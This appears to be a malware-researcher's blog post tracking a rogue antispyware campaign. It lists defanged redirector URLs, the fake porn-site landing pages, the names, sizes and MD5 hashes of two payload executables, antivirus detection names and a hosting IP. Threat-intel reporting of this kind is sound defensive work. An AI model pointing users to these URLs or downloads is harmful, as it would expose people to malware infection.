Link: Google Safe Browsing Diagnostic for an infected domain

Youtube video lead to Rogue AntiSpyware - Antivirus360
MalwareDefender2009 - EasyWinScanner17 - FakeSpyGuard
Antivirus360 - Crucialsoft ltd ms antispyware 2009
Compromised websites used to spread malware


active domains on March 16:


Today it changed: this time it is not the go4scan / go5scan /
scan4main / scan4... family but a fake porn tube site.

hxxp://zorroless. com/in.php
hxxp://hola-aloha. net/in.php
hxxp://x-more-x. net/in.php
hxxp://sendsometraff. com/in.php

Redirect to

hxxp://tube-funs-world.com/promo2/?aid=561&vname=free_dvd_rip

The site asks me to download free_dvd_rip.exe

File size: 2862989 bytes
MD5...: f35144147bfd9a7e47e4ae7d79d9b2d1

Result: 4/39 (10.26%)

VirusTotal: Permalink
ThreatExpert: Permalink RogueAntispyware-sysguard

or

hxxp://tube-funs-world.com/promo2/2.php?aid=561&vname=stream_player_plugin

stream_player_plugin.exe

File size: 3159829 bytes
MD5...: 5cf2fcaaac2863b850aabd96f85c5ed8

Result: 4/39 (10.26%)

VirusTotal: Permalink

eSafe [Win32.SPRFraud.PrivC]
Sus/Behav-113 [Sophos]
Privacy components [Sunbelt]
Adware/Agent.gen [TheHacker]


Hosted on 78.26.179.34

